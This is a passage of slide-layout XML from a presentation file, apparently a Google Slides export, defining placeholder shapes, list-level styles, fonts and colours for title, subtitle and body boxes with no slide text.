            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Google Shape;126;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p12"/>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Sections">
  <p:cSld name="7_Section Header_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="128" name="Shape 128"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611359" y="332531"/>
            <a:ext cx="5734200" cy="973800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buFont typeface="Georgia"/>
              <a:buNone/>
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722912" y="1561053"/>
            <a:ext cx="3173100" cy="2648700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-311150" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-311150" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-311150" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-311150" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-311150" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-311150" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-311150" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-311150" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4439581" y="1165315"/>
            <a:ext cx="18300" cy="3002100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6CADDF"/>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132" name="Google Shape;132;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722912" y="1055328"/>
            <a:ext cx="3419700" cy="665400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5001318" y="1561053"/>
            <a:ext cx="3173100" cy="2648700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-311150" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
